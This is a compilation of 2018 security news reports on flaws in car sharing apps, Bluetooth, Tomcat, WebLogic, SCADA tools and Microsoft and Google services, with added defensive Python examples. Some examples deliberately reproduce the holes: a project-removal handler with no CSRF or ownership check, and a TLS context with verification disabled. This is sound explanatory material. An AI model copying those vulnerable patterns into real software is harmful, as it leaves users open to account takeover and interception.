Car sharing applications can be a tempting target for malicious actors for several reasons. They could hijack the legitimate user’s account in order to drive cars without actually paying for them, steal vehicles for their parts or to commit crimes, track users’ locations, and obtain the account holder’s personal information.

While some of these are theoretical risks, Kaspersky pointed out that cybercriminals are already selling hijacked car sharing accounts. The sellers claim these accounts can be useful for several things, including for driving a car without a license.

Researchers first checked to see if the applications can be reverse engineered and if they can be executed with root privileges. Failure to prevent unauthorized individuals from reverse engineering an application increases the risk of someone creating a malicious version of the app. Allowing an app to run on a rooted device enables an attacker to access sensitive information.

Only one of the apps had reverse engineering protections in place, but it did not prevent execution on a rooted device. On the other hand, the app in question did encrypt sensitive data, which mitigates the risk introduced by allowing it to run with elevated privileges.

Kaspersky also verified the strength of the passwords protecting car sharing accounts. Experts found that in many cases developers set weak passwords or provide users with short one-time verification codes. This, combined with the lack of any limit on the number of login attempts, makes it easier to launch brute-force attacks and obtain a password or one-time code.

Brute force attack on car sharing app

The users of car sharing apps can often be identified on social media – it’s not uncommon for them to post pictures while driving and use a specific hashtag – and they often unwittingly expose their phone number on these websites.

Phone numbers are important for attackers as this piece of information can represent the username and it’s where the car sharing company sends one-time passwords.
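The weakness just described (short one-time codes combined with no limit on login attempts) next to the usual server-side mitigation, as an added example that is not code from any of the tested apps. The code length, attempt budget, validity window, in-memory store and injectable clock are assumptions chosen for the demonstration.

```python
"""One-time code verification with attempt limiting and expiry.

Added example illustrating the weakness Kaspersky describes (short codes with
no limit on login attempts) next to the usual server-side mitigation. It is
not code from any car sharing app; the limits, the in-memory store and the
injectable clock are assumptions chosen for the demonstration.
"""
import hmac
import secrets
import time

CODE_DIGITS = 6          # assumed code length
MAX_ATTEMPTS = 5         # assumed attempt budget per issued code
CODE_TTL_SECONDS = 300   # assumed validity window


class OtpVerifier:
    """Keeps one pending code per account identifier (here: the phone number)."""

    def __init__(self, clock=time.time):
        self._pending = {}      # phone -> {"code", "issued_at", "attempts", "used"}
        self._clock = clock

    def issue(self, phone):
        """Generate a fresh code; returned here so the demo can use it. In
        production it would only be sent out of band (SMS)."""
        code = "".join(secrets.choice("0123456789") for _ in range(CODE_DIGITS))
        self._pending[phone] = {"code": code, "issued_at": self._clock(),
                                "attempts": 0, "used": False}
        return code

    def verify(self, phone, candidate):
        """Return one of: ok, wrong, locked, expired, no-pending-code."""
        entry = self._pending.get(phone)
        if entry is None or entry["used"]:
            return "no-pending-code"
        if self._clock() - entry["issued_at"] > CODE_TTL_SECONDS:
            del self._pending[phone]
            return "expired"
        if entry["attempts"] >= MAX_ATTEMPTS:
            return "locked"          # stays locked until a new code is issued
        entry["attempts"] += 1
        # constant-time comparison: no timing hint about matching digits
        if hmac.compare_digest(entry["code"], str(candidate)):
            entry["used"] = True
            return "ok"
        return "wrong"


def guess_success_probability(digits, max_attempts=None):
    """Chance that an online guesser hits one specific code. Without a limit
    the whole space can be enumerated, so the probability is 1."""
    space = 10 ** digits
    if max_attempts is None:
        return 1.0
    return min(1.0, max_attempts / space)


def demo():
    """Walk through lockout, expiry, success and replay with a fake clock."""
    clock = {"now": 1_000_000.0}
    v = OtpVerifier(clock=lambda: clock["now"])
    phone = "+15550100"                       # constructed sample number
    code = v.issue(phone)
    wrong = "000000" if code != "000000" else "111111"
    outcomes = [v.verify(phone, wrong) for _ in range(MAX_ATTEMPTS + 1)]
    after_lock = v.verify(phone, code)        # right code, but budget exhausted
    code2 = v.issue(phone)
    clock["now"] += CODE_TTL_SECONDS + 1
    expired = v.verify(phone, code2)
    code3 = v.issue(phone)
    ok = v.verify(phone, code3)
    replay = v.verify(phone, code3)
    return outcomes, after_lock, expired, ok, replay
```

`guess_success_probability(4)` is 1.0 for a four-digit code with no attempt limit, which is the situation the report describes; with a six-digit code and a budget of five attempts per issued code it drops to five in a million, and the lockout has to be tracked per account, not per connection, or the attacker simply reconnects.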

Researchers also noticed that while the applications use HTTPS for communications with the server, they all fail to check the server’s certificate, making it easier to launch man-in-the-middle (MitM) attacks and intercept potentially sensitive data.

Finally, experts checked if the apps include any overlay protections. Specifically, they verified if developers implemented any mechanisms that would prevent attackers who already have access to a smartphone from showing a fake window (i.e. a phishing page) on top of the legitimate car sharing application. Unfortunately, none of the tested apps protect users against this threat.

Kaspersky has not named any of the tested applications, but did point out that the ones made by companies in the U.S. and Europe are more secure than the ones of Russian firms.

“Our research concluded that, in their current state, applications for car sharing services are not ready to withstand malware attacks,” explained Victor Chebyshev, security expert at Kaspersky Lab. “While we have not yet detected any cases of sophisticated attacks against car sharing services, cybercriminals understand the value that such apps hold, and existing offers on the black market point to the fact that vendors do not have much time to remove the vulnerabilities.”


Hide ‘N Seek botnet also includes exploits for home automation systems
25.7.2018 securityaffairs
Vulnerebility

Security experts from Fortinet have discovered that the Hide ‘N Seek botnet is now targeting vulnerabilities in home automation systems.
The Hide ‘N Seek botnet was first spotted on January 10th when it was targeting home routers and IP cameras.

It was first spotted on January 10th by malware researchers from Bitdefender; it then disappeared for a few days and reappeared a few weeks later, infecting more than 20,000 devices in less than a week.

Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnet. Unlike Mirai, Hajime does not use C&C servers; instead, it implements a peer-to-peer network.

Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.

In May the botnet infected over 90,000 unique devices. More recently, researchers from Qihoo 360’s NetLab discovered that the bot was also targeting AVTECH webcams, Cisco Linksys routers, and OrientDB and CouchDB database servers.

Hide ‘N Seek timeline

Fortinet experts have compared three different versions of the bot over time.

The security firm reports that the latest version of the bot has a configuration made up of 110 entries and 9 exploits.

“We can easily spot the difference between them simply by the number of entries each one has. We are particularly interested in the exploits that each version is using.” states Fortinet.

“The first variant, as shown below, has a configuration made up of 60 entries that includes 2 exploits, the second has 81 entries and 6 exploits, while the most recent now has 110 entries and 9 exploits.”

Hide ‘N Seek authors recently included an exploit for a HomeMatic Zentrale CCU2 remote code execution vulnerability; the malicious code allows the botnet to target devices in smart homes controlled by the HomeMatic central unit.

The bot also includes the exploit for an RCE issue in the Belkin NetCam devices.

The experts believe the author of the Hide ‘N Seek botnet will continue to improve the bot by adding new exploits to target a broad range of devices.

The security researchers also say they expect the threat to add more functions in future iterations, as well as to make greater use of publicly available exploits.

“HNS has been aggressively adding exploits and targeting more platforms and devices to increase its propagation scope. Utilizing freshly released PoC exploits to its arsenal increases the chance for it to be the first to infect these vulnerable devices,” Fortinet concludes.

“With this new understanding of this malware’s recent behaviour we expect the next alterations to include more functions as well as the usage of publicly available exploits.”


CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic
25.7.2018 securityaffairs
Vulnerebility

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.
Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue, tracked as CVE-2018-5383, affects the Secure Simple Pairing and LE Secure Connections features; it is present in firmware or drivers from some major vendors, including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, and can then monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure,” reads the advisory published by the Bluetooth SIG.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful.”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification: products are now required to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited in attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer may be impacted; the company added that security fixes have already been provided to OEM customers.


Apache Software Foundation fixes important flaws in Apache Tomcat
25.7.2018 securityaffairs
Vulnerebility

The Apache Software Foundation has rolled out security updates for the Tomcat application server that address several flaws.
The Apache Software Foundation has released security updates for the Tomcat application server that address several vulnerabilities, including issues that trigger a denial-of-service (DoS) condition or can lead to information disclosure.

Apache Tomcat is an open-source Java Servlet Container that implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run.

It has been estimated that Tomcat has a market share of over 60 percent.

The first flaw addressed by the Apache Software Foundation is CVE-2018-8037, an important bug in the tracking of connection closures that can lead to the reuse of user sessions in a new connection.

The flaw affects Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Tomcat 9.0.10 and 8.5.32 releases address the vulnerabilities.

Another important issue addressed by the Foundation is CVE-2018-1336: improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, triggering a denial-of-service condition.

The vulnerability affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x.

Versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90 address the vulnerability.

The Apache Software Foundation also fixed a low severity security constraints bypass tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the security advisory.

The vulnerability has been addressed with the release of the latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x versions.

The US-CERT has released a security alert that urges users to apply security updates.

“The Apache Software Foundation has released security updates to address vulnerabilities in Apache Tomcat versions 9.0.0.M9 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. A remote attacker could exploit one of these vulnerabilities to obtain sensitive information.” reads the security advisory published by the US-CERT.

“NCCIC encourages users and administrators to review the Apache security advisories for CVE-2018-8037 and CVE-2018-1336 and apply the necessary updates.”

Apache Tomcat vulnerabilities are less likely to be exploited in the wild.



Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek
Vulnerebility

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.



AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek
Vulnerebility

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.

AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix 81.1.00.08 for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.


Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek
Vulnerebility

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.


Information Disclosure, DoS Flaws Patched in Apache Tomcat
24.7.2018 securityweek
Vulnerebility

The Apache Software Foundation informed users over the weekend that updates for the Tomcat application server address several vulnerabilities, including issues that can lead to information disclosure and a denial-of-service (DoS) condition.

Apache Tomcat is an open source implementation of the Java Servlet, JavaServer Pages (JSP), Java WebSocket and Java Expression Language technologies. Tomcat is the most widely used web application server, with a market share of over 60 percent.

One of the more serious flaws, CVE-2018-8037, impacts Tomcat versions 9.0.0.M9 through 9.0.9 and 8.5.5 through 8.5.31. Patches are included in Tomcat 9.0.10 and 8.5.32.

The vulnerability, rated “important,” has been described by the Apache Software Foundation as an information disclosure issue caused by a bug in the tracking of connection closures that can lead to user sessions getting mixed up.

Another security hole rated “important” is CVE-2018-1336, a bug in the UTF-8 decoder that can lead to a DoS condition. The flaw affects Tomcat versions 7.0.x, 8.0.x, 8.5.x and 9.0.x, and it has been resolved with the release of versions 9.0.7, 8.5.32, 8.0.52 and 7.0.90.

“An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service,” the Apache Software Foundation said in its advisory.

The latest Tomcat 7.0.x, 8.0.x, 8.5.x and 9.0.x releases also patch a low severity security constraints bypass issue tracked as CVE-2018-8034.

“The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default,” reads the advisory for this vulnerability.

US-CERT has also released an alert, recommending that users review the Apache advisories and apply the updates.

Apache Tomcat vulnerabilities are less likely to be exploited in the wild. There was a worm targeting Apache Tomcat servers a few years ago, but it leveraged common username and password combinations rather than exploiting any vulnerabilities.

The Apache Software Foundation also informed customers last week of vulnerabilities impacting Apache Ignite, an open source memory-centric distributed database, caching, and processing platform. Ignite is currently ranked 66 by DB-Engines.

Ignite is impacted by two security holes, both of which could lead to arbitrary code execution.
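CVE-2018-8034, covered in both Tomcat articles above, is a TLS client that validated the certificate chain but not that the certificate was issued for the host it connected to; Kaspersky's car sharing findings earlier on this page describe the same gap on the app side. The following added example (not Tomcat's WebSocket client) shows what the Python standard library's hardened client context enables and what a weakened one turns off, and spells out the reference-identifier rule that host name verification applies to a certificate's DNS names. The sample names are constructed.

```python
"""TLS client settings with host name verification, and the matching rule itself.

Added example, not Tomcat's WebSocket client. client_context() shows the
hardened and the weakened client configuration; hostname_matches() implements
the RFC 6125-style comparison a verifier performs between the connected host
name and the certificate's dNSName entries, so the reader can see what
"host name verification" actually decides. Sample names are constructed.
"""
import ipaddress
import ssl


def client_context(verify=True):
    """verify=True gives chain validation plus host name checking, the
    configuration a client should ship with; verify=False reproduces the
    weakened setup (accept any certificate for any host)."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False           # must be disabled before verify_mode
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hostname_matches(presented_dns_names, hostname):
    """Compare a host name against a certificate's dNSName entries:
    case-insensitive, label by label, with a wildcard allowed only as the
    whole leftmost label, never matching more than one label, and never
    standing in for a public suffix such as "*.com"."""
    host = hostname.rstrip(".").lower()
    try:
        ipaddress.ip_address(host)
        return False     # IP literals must match iPAddress entries, not dNSName
    except ValueError:
        pass
    host_labels = host.split(".")
    for name in presented_dns_names:
        labels = name.rstrip(".").lower().split(".")
        if len(labels) != len(host_labels):
            continue
        if "*" in name:
            wildcard_ok = (labels[0] == "*"
                           and not any("*" in label for label in labels[1:])
                           and len(labels) >= 3)
            if not wildcard_ok:
                continue
        if all(p == "*" or p == h for p, h in zip(labels, host_labels)):
            return True
    return False
```

Chain validation alone answers "did a trusted CA sign this certificate?"; without the host name comparison, any valid certificate for any site satisfies the client, which is what makes a man-in-the-middle with an unrelated but legitimately issued certificate possible. In the Python context the order matters: `check_hostname` has to be switched off before `verify_mode` can be lowered, a small guard against lowering one without noticing the other.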


Microsoft Addresses Serious Vulnerability in Translator Hub
23.7.2018 securityweek
Vulnerebility

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises to build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Mahmood also discovered that the request had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged-in user and perform actions on their behalf.

An attack scenario, he says, would require an attacker to know the ProjectID number of a logged-in victim. They could then include a URL in a page that issues a remove command and, as soon as the victim visits that page, the request would be sent from the victim’s browser and the project removed.

Further analysis of the issue revealed an Insecure Direct Object Reference (IDOR) vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.
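The two missing checks described above (no CSRF protection on the removal request, and a projectid that is trusted without an ownership check), as an added example that is not Microsoft Translator Hub code. It models the removal request against an in-memory store; the store layout, the header name, the sample users and project ids are constructed.

```python
"""Project removal endpoint with anti-CSRF token and ownership checks.

Added example, not Microsoft Translator Hub code. It models the remove-project
request described above (a projectid parameter) against an in-memory store and
adds the two checks the report says were missing: the request must carry a
per-session token that a cross-site page cannot read, and the project must
belong to the calling user so the id cannot be pointed at someone else's
project. The store layout, header name and sample ids are constructed.
"""
import hmac
import secrets


class Session:
    """Server-side session; the CSRF token is issued with it and embedded in
    the application's own pages, never readable by another origin."""

    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)


class ProjectStore:
    def __init__(self):
        self.owner_of = {}          # project_id -> owning user

    def create(self, project_id, owner):
        self.owner_of[project_id] = owner


def remove_project_reported(store, session, params):
    """The behaviour described in the report: any authenticated request that
    names a project id deletes it, with no token and no ownership check."""
    project_id = int(params["projectid"])
    if project_id in store.owner_of:
        del store.owner_of[project_id]
        return 200
    return 404


def remove_project_hardened(store, session, params, headers):
    """Same operation with CSRF and object-reference checks added."""
    token = headers.get("X-CSRF-Token", "")
    # A forged cross-site request rides on the victim's cookies but cannot
    # supply this value; compare in constant time.
    if not hmac.compare_digest(token, session.csrf_token):
        return 403
    try:
        project_id = int(params["projectid"])
    except (KeyError, ValueError):
        return 400
    # Ownership check: answer 404 for both "missing" and "not yours" so the
    # response does not confirm which ids exist.
    if store.owner_of.get(project_id) != session.user:
        return 404
    del store.owner_of[project_id]
    return 200


def demo():
    store = ProjectStore()
    store.create(101, "alice")
    store.create(102, "bob")
    alice = Session("alice")

    # Reported behaviour: Alice's session deletes Bob's project outright.
    reported = remove_project_reported(store, alice, {"projectid": "102"})

    store.create(102, "bob")   # restore for the hardened run
    forged = remove_project_hardened(store, alice, {"projectid": "101"}, {})   # no token
    foreign = remove_project_hardened(store, alice, {"projectid": "102"},
                                      {"X-CSRF-Token": alice.csrf_token})
    own = remove_project_hardened(store, alice, {"projectid": "101"},
                                  {"X-CSRF-Token": alice.csrf_token})
    return reported, forged, foreign, own, sorted(store.owner_of)
```

The two checks address different attackers: the token stops a page on another origin from driving the victim's browser, and the ownership check stops an authenticated user from naming ids that are not theirs. Either one alone leaves the other path open, which is why the reported request needed both.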

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.


SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek
Vulnerability

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.
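The bypass described above worked because the Caja server's restriction was "any Google domain", and an attacker can host files on Google Cloud. The policy check below is an added example (not Google's or Caja's code) of what a server-side fetcher should verify before retrieving a user-supplied URL: an exact-host allowlist rather than a domain suffix, no allowlisted host that serves user-uploaded content, and a resolve-then-check step that rejects addresses inside the fetcher's own network. The host names, the `demo_resolver` table and its addresses are constructed for the example.

```python
import ipaddress
from typing import Callable, Iterable, Set, Tuple
from urllib.parse import urlsplit

# Constructed allowlist for the example. Exact host names only: matching on a
# suffix such as ".example.com" is what lets attacker-hosted content on a
# shared platform domain through, which is the bypass the article describes.
# Any host that serves user-uploaded content must be kept off this list.
ALLOWED_HOSTS: Set[str] = {"static.example.com", "cdn.example.com"}


def is_public_ip(ip: str) -> bool:
    """Reject anything that points into the fetcher's own network."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_url(url: str, resolve: Callable[[str], Iterable[str]],
                    allowed_hosts: Set[str] = ALLOWED_HOSTS) -> Tuple[bool, str]:
    """Decide whether a server-side fetcher may retrieve `url`.

    `resolve(host)` returns the addresses the fetcher will actually connect to;
    using the same resolution for the check and for the connection closes the
    DNS-rebinding gap between check time and use time. Returns (allowed, reason).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in allowed_hosts:
        return False, "host not in allowlist"
    if port not in (None, 80, 443):
        return False, "port not allowed"
    ips = list(resolve(host))
    if not ips:
        return False, "unresolvable host"
    for ip in ips:
        if not is_public_ip(ip):
            return False, f"resolves to non-public address {ip}"
    return True, "ok"


def demo_resolver(host: str) -> Iterable[str]:
    """Constructed DNS table so the example runs offline; a real fetcher would
    call socket.getaddrinfo here and connect to the address it returns."""
    table = {
        "static.example.com": ["93.184.216.34"],  # constructed public address
        "cdn.example.com": ["10.0.0.5"],          # allowlisted name pointing inward
    }
    return table.get(host, [])


if __name__ == "__main__":
    for u in ("https://static.example.com/lib.js",
              "https://static.example.com.attacker.invalid/lib.js",
              "http://cdn.example.com/lib.js",
              "file:///etc/hosts"):
        print(u, "->", check_fetch_url(u, demo_resolver))
```

The check has to be repeated on every redirect hop, since an allowlisted host can 302 to an internal address; and, as the article's outcome shows, the allowlist itself is the weak point whenever one of its entries lets third parties publish content.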


Microsoft Addresses Serious Vulnerability in Translator Hub
22.7.2018 securityweek
Vulnerability

A serious vulnerability in the Microsoft Translator Hub could be exploited to delete any or all of the 13000+ projects hosted by the service, a security researcher has discovered.

The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises to build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Mahmood also discovered that the request had no Cross-Site Request Forgery (CSRF) protection, meaning an attacker could impersonate a legitimate, logged-in user and perform actions on their behalf.

